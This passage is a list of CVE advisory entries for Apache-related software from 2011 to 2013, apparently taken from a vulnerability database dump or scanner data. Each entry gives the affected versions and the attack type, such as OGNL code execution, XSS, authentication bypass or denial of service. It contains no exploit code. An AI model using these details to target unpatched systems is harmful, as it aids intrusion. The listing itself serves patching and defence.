13317| [CVE-2013-2067] java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.
13318| [CVE-2013-1966] Apache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.
13319| [CVE-2013-1965] Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
13320| [CVE-2013-1896] mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.
13321| [CVE-2013-1884] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (segmentation fault and crash) via a log REPORT request with an invalid limit, which triggers an access of an uninitialized variable.
13322| [CVE-2013-1879] Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."
13323| [CVE-2013-1862] mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.
13324| [CVE-2013-1849] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a PROPFIND request for an activity URL.
13325| [CVE-2013-1847] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an anonymous LOCK for a URL that does not exist.
13326| [CVE-2013-1846] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a LOCK on an activity URL.
13327| [CVE-2013-1845] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (memory consumption) by (1) setting or (2) deleting a large number of properties for a file or directory.
13328| [CVE-2013-1814] The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.
13329| [CVE-2013-1777] The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not property implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
13330| [CVE-2013-1768] The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and 2.x before 2.2.2 creates local executable JSP files containing logging trace data produced during deserialization of certain crafted OpenJPA objects, which makes it easier for remote attackers to execute arbitrary code by creating a serialized object and leveraging improperly secured server programs.
13331| [CVE-2013-1088] Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 before SP6 Patch 1 allows remote attackers to hijack the authentication of arbitrary users by leveraging improper request validation by iManager code deployed within an Apache Tomcat container.
13332| [CVE-2013-1048] The Debian apache2ctl script in the apache2 package squeeze before 2.2.16-6+squeeze11, wheezy before 2.2.22-13, and sid before 2.2.22-13 for the Apache HTTP Server on Debian GNU/Linux does not properly create the /var/lock/apache2 lock directory, which allows local users to gain privileges via an unspecified symlink attack.
13333| [CVE-2013-0966] The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac OS X before 10.8.3 does not properly handle ignorable Unicode characters, which allows remote attackers to bypass intended directory authentication requirements via a crafted pathname in a URI.
13334| [CVE-2013-0942] Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Agent 7.1 before 7.1.1 for Web for Internet Information Services, and 7.1 before 7.1.1 for Web for Apache, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13335| [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data.
13336| [CVE-2013-0253] The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
13337| [CVE-2013-0248] The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack.
13338| [CVE-2013-0239] Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.
13339| [CVE-2012-6573] Cross-site scripting (XSS) vulnerability in the Apache Solr Autocomplete module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors involving autocomplete results.
13340| [CVE-2012-6551] The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.
13341| [CVE-2012-6092] Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.
13342| [CVE-2012-5887] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.
13343| [CVE-2012-5886] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.
13344| [CVE-2012-5885] The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.
13345| [CVE-2012-5786] The wsdl_first_https sample code in distribution/src/main/release/samples/wsdl_first_https/src/main/ in Apache CXF, possibly 2.6.0, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13346| [CVE-2012-5785] Apache Axis2/Java 1.6.2 and earlier does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13347| [CVE-2012-5784] Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13348| [CVE-2012-5783] Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13349| [CVE-2012-5633] The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.
13350| [CVE-2012-5616] Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly Citrix CloudStack) before 3.0.6 stores sensitive information in the log4j.conf log file, which allows local users to obtain (1) the SSH private key as recorded by the createSSHKeyPair API, (2) the password of an added host as recorded by the AddHost API, or the password of an added VM as recorded by the (3) DeployVM or (4) ResetPasswordForVM API.
13351| [CVE-2012-5568] Apache Tomcat through 7.0.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.
13352| [CVE-2012-5351] Apache Axis2 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a "Signature exclusion attack," a different vulnerability than CVE-2012-4418.
13353| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
13354| [CVE-2012-4557] The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.
13355| [CVE-2012-4556] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 allows remote attackers to cause a denial of service (Apache httpd web server child process restart) via certain unspecified empty search fields in a user certificate search query.
13356| [CVE-2012-4555] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 does not properly handle interruptions of token format operations, which allows remote attackers to cause a denial of service (NULL pointer dereference and Apache httpd web server child process crash) via unspecified vectors.
13357| [CVE-2012-4534] org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28, when the NIO connector is used in conjunction with sendfile and HTTPS, allows remote attackers to cause a denial of service (infinite loop) by terminating the connection during the reading of a response.
13358| [CVE-2012-4528] The mod_security2 module before 2.7.0 for the Apache HTTP Server allows remote attackers to bypass rules, and deliver arbitrary POST data to a PHP application, via a multipart request in which an invalid part precedes the crafted data.
13359| [CVE-2012-4501] Citrix Cloud.com CloudStack, and Apache CloudStack pre-release, allows remote attackers to make arbitrary API calls by leveraging the system user account, as demonstrated by API calls to delete VMs.
13360| [CVE-2012-4460] The serializing/deserializing functions in the qpid::framing::Buffer class in Apache Qpid 0.20 and earlier allow remote attackers to cause a denial of service (assertion failure and daemon exit) via unspecified vectors. NOTE: this issue could also trigger an out-of-bounds read, but it might not trigger a crash.
13361| [CVE-2012-4459] Integer overflow in the qpid::framing::Buffer::checkAvailable function in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (crash) via a crafted message, which triggers an out-of-bounds read.
13362| [CVE-2012-4458] The AMQP type decoder in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (memory consumption and server crash) via a large number of zero width elements in the client-properties map in a connection.start-ok message.
13363| [CVE-2012-4446] The default configuration for Apache Qpid 0.20 and earlier, when the federation_tag attribute is enabled, accepts AMQP connections without checking the source user ID, which allows remote attackers to bypass authentication and have other unspecified impact via an AMQP request.
13364| [CVE-2012-4431] org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.
13365| [CVE-2012-4418] Apache Axis2 allows remote attackers to forge messages and bypass authentication via an "XML Signature wrapping attack."
13366| [CVE-2012-4387] Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.
13367| [CVE-2012-4386] The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.
13368| [CVE-2012-4360] Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0.10.19.1 through 0.10.22.4 for the Apache HTTP Server allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13369| [CVE-2012-4063] The Apache Santuario configuration in Eucalyptus before 3.1.1 does not properly restrict applying XML Signature transforms to documents, which allows remote attackers to cause a denial of service via unspecified vectors.
13370| [CVE-2012-4001] The mod_pagespeed module before 0.10.22.6 for the Apache HTTP Server does not properly verify its host name, which allows remote attackers to trigger HTTP requests to arbitrary hosts via unspecified vectors, as demonstrated by requests to intranet servers.
13371| [CVE-2012-3908] Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE Administrator user interface (aka the Apache Tomcat interface) on Cisco Identity Services Engine (ISE) 3300 series appliances before 1.1.0.665 Cumulative Patch 1 allow remote attackers to hijack the authentication of administrators, aka Bug ID CSCty46684.
13372| [CVE-2012-3546] org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.30, when FORM authentication is used, allows remote attackers to bypass security-constraint checks by leveraging a previous setUserPrincipal call and then placing /j_security_check at the end of a URI.
13373| [CVE-2012-3544] Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.
13374| [CVE-2012-3526] The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the Apache HTTP Server allows remote attackers to cause a denial of service (server or application crash) via multiple X-Forwarded-For headers in a request.
13375| [CVE-2012-3513] munin-cgi-graph in Munin before 2.0.6, when running as a CGI module under Apache, allows remote attackers to load new configurations and create files in arbitrary directories via the logdir command.
13376| [CVE-2012-3506] Unspecified vulnerability in the Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.03 has unknown impact and attack vectors.
| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
| [CVE-2012-3467] Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism to authenticate catch-up shadow connections to AMQP brokers, which allows remote attackers to bypass authentication.
| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
| [CVE-2012-3446] Apache Libcloud before 0.11.1 uses an incorrect regular expression during verification of whether the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a crafted certificate.
| [CVE-2012-3376] DataNodes in Apache Hadoop 2.0.0 alpha does not check the BlockTokens of clients when Kerberos is enabled and the DataNode has checked out the same BlockPool twice from a NodeName, which might allow remote clients to read arbitrary blocks, write to blocks to which they only have read access, and have other unspecified impacts.
| [CVE-2012-3373] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app.
| [CVE-2012-3126] Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Apache Tomcat Agent.
| [CVE-2012-3123] Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect confidentiality, related to Apache HTTP Server.
| [CVE-2012-2760] mod_auth_openid before 0.7 for Apache uses world-readable permissions for /tmp/mod_auth_openid.db, which allows local users to obtain session ids.
| [CVE-2012-2733] java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP NIO connector in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28 does not properly restrict the request-header size, which allows remote attackers to cause a denial of service (memory consumption) via a large amount of header data.
| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
| [CVE-2012-2381] Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.
| [CVE-2012-2380] Multiple cross-site request forgery (CSRF) vulnerabilities in the admin/editor console in Apache Roller before 5.0.1 allow remote attackers to hijack the authentication of admins or editors by leveraging the HTTP POST functionality.
| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
| [CVE-2012-2329] Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.
| [CVE-2012-2145] Apache Qpid 0.17 and earlier does not properly restrict incoming client connections, which allows remote attackers to cause a denial of service (file descriptor consumption) via a large number of incomplete connections.
| [CVE-2012-2138] The @CopyFrom operation in the POST servlet in the org.apache.sling.servlets.post bundle before 2.1.2 in Apache Sling does not prevent attempts to copy an ancestor node to a descendant node, which allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP request.
| [CVE-2012-2098] Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.
| [CVE-2012-1574] The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.
| [CVE-2012-1181] fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.
| [CVE-2012-1089] Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.
| [CVE-2012-1007] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.
| [CVE-2012-1006] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.
| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
| [CVE-2012-0840] tables/apr_hash.c in the Apache Portable Runtime (APR) library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
| [CVE-2012-0838] Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.
| [CVE-2012-0788] The PDORow implementation in PHP before 5.3.9 does not properly interact with the session feature, which allows remote attackers to cause a denial of service (application crash) via a crafted application that uses a PDO driver for a fetch and then calls the session_start function, as demonstrated by a crash of the Apache HTTP Server.
| [CVE-2012-0394] ** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
| [CVE-2012-0393] The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.
| [CVE-2012-0392] The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
| [CVE-2012-0391] The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.
| [CVE-2012-0256] Apache Traffic Server 2.0.x and 3.0.x before 3.0.4 and 3.1.x before 3.1.3 does not properly allocate heap memory, which allows remote attackers to cause a denial of service (daemon crash) via a long HTTP Host header.
| [CVE-2012-0216] The default configuration of the apache2 package in Debian GNU/Linux squeeze before 2.2.16-6+squeeze7, wheezy before 2.2.22-4, and sid before 2.2.22-4, when mod_php or mod_rivet is used, provides example scripts under the doc/ URI, which might allow local users to conduct cross-site scripting (XSS) attacks, gain privileges, or obtain sensitive information via vectors involving localhost HTTP requests to the Apache HTTP Server.
| [CVE-2012-0213] The UnhandledDataStructure function in hwpf/model/UnhandledDataStructure.java in Apache POI 3.8 and earlier allows remote attackers to cause a denial of service (OutOfMemoryError exception and possibly JVM destabilization) via a crafted length value in a Channel Definition Format (CDF) or Compound File Binary Format (CFBF) document.
| [CVE-2012-0053] protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
| [CVE-2012-0047] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.
| [CVE-2012-0031] scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.
| [CVE-2012-0022] Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.
| [CVE-2012-0021] The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.
| [CVE-2011-5064] DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.
| [CVE-2011-5063] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.
| [CVE-2011-5062] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.
| [CVE-2011-5057] Apache Struts 2.3.1.1 and earlier provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."
| [CVE-2011-5034] Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.
| [CVE-2011-4905] Apache ActiveMQ before 5.6.0 allows remote attackers to cause a denial of service (file-descriptor exhaustion and broker crash or hang) by sending many openwire failover:tcp:// connection requests.
| [CVE-2011-4858] Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
| [CVE-2011-4668] IBM Tivoli Netcool/Reporter 2.2 before 2.2.0.8 allows remote attackers to execute arbitrary code via vectors related to an unspecified CGI program used with the Apache HTTP Server.
| [CVE-2011-4449] actions/files/files.php in WikkaWiki 1.3.1 and 1.3.2, when INTRANET_MODE is enabled, supports file uploads for file extensions that are typically absent from an Apache HTTP Server TypesConfig file, which makes it easier for remote attackers to execute arbitrary PHP code by placing this code in a file whose name has multiple extensions, as demonstrated by a (1) .mm or (2) .vpp file.
| [CVE-2011-4415] The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL pointer dereference) via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, related to (1) the "len +=" statement and (2) the apr_pcalloc function call, a different vulnerability than CVE-2011-3607.
| [CVE-2011-4317] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
| [CVE-2011-3639] The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
| [CVE-2011-3620] Apache Qpid 0.12 does not properly verify credentials during the joining of a cluster, which allows remote attackers to obtain access to the messaging functionality and job functionality of a cluster by leveraging knowledge of a cluster-username.
| [CVE-2011-3607] Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
| [CVE-2011-3376] org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.
| [CVE-2011-3375] Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.
| [CVE-2011-3368] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
| [CVE-2011-3348] The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.
| [CVE-2011-3192] The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
| [CVE-2011-3190] Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
